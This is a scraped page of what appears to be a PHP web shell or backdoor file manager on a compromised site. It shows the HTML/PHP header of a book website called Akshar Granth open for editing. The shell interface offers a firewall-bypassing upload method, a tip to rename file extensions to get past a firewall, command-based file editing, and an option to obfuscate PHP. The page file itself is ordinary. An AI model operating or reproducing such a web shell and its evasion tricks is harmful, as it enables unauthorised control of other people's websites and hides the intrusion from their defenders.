Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
home
sofftech
akshargranth.apninokari.com
File Name:
<html lang="zxx"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Akshar Granth</title> <!-- Template CSS --> <link rel="stylesheet" href="assets/css/style-starter.css"> <!-- Template CSS --> <link href="//fonts.googleapis.com/css?family=Spartan:400,500,600,700,900&display=swap" rel="stylesheet"> <!-- Template CSS --> <?php $iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone"); $android = strpos($_SERVER['HTTP_USER_AGENT'],"Android"); $palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS"); $berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry"); $ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod"); if ($iphone || $android || $palmpre || $ipod || $berry == true) { ?> <style> .md{height:281px;} </style> <?php } else { ?> <style> .md{height:527px; width:373px;} </style> <?php } ?> </head> <body class="cbp-spmenu-push"> <nav class="cbp-spmenu cbp-spmenu-vertical cbp-spmenu-left" id="cbp-spmenu-s1"> <h3>Menu</h3> <ul> <li><a class="active" href="index.php">Home</a></li> <li><a href="about.php">About Us</a></li> <li><a href="browse_books.php">Books <li><a href="contact.php">Contact</a></li> </ul> </nav> <div class="main buttonset" style=""> <!--/tophny-header--> <div class="tophny-header"> <div class="container"> <div class="hny-topgds"> <div class="menu-notify"> <button id="showLeftPush"><span class="fa fa-bars" aria-hidden="true"></span></button> </div> <div class="logo text-center"> <h1><a class="navbar-brand" href="index.php"> अक्षर GRANTH </a></h1> <!-- if logo is image enable this <a class="navbar-brand" href="#main.html"> <img src="image-path" alt="Your logo" title="Your logo" style="height:35px;" /> </a> --> </div> <div class="icon-left search-right text-right"> <a class="topuser" href="login.php"><span class="fa fa-user" aria-hidden="true"></span></a> <a href="#search" class="hnysearch-icon" title="search"><span class="fa fa-search" aria-hidden="true"></span></a> <!-- search popup --> <div id="search" class="pop-overlay"> <div class="popup"> <h3 class="hny-title two">Search Here</h3> <form action="search.php" method="get" class="search-box"> <input type="search" placeholder="Search your Keyword" name="search" required="required" autofocus=""> <button type="submit" class="btn">Search</button> </form> </div> <a class="close" href="#close" style="color:red;">x</a> </div> <!-- /search popup --> </div> </div> </div> <!--//tophny-header--> </div>
Bypass Options
Select edit method
Using basic write file
Using command
Info
Info!
If the strings too long, it will be failed to edit file (command method only).
Obfuscate PHP:
No Obfuscate
Obfuscate
Save Changes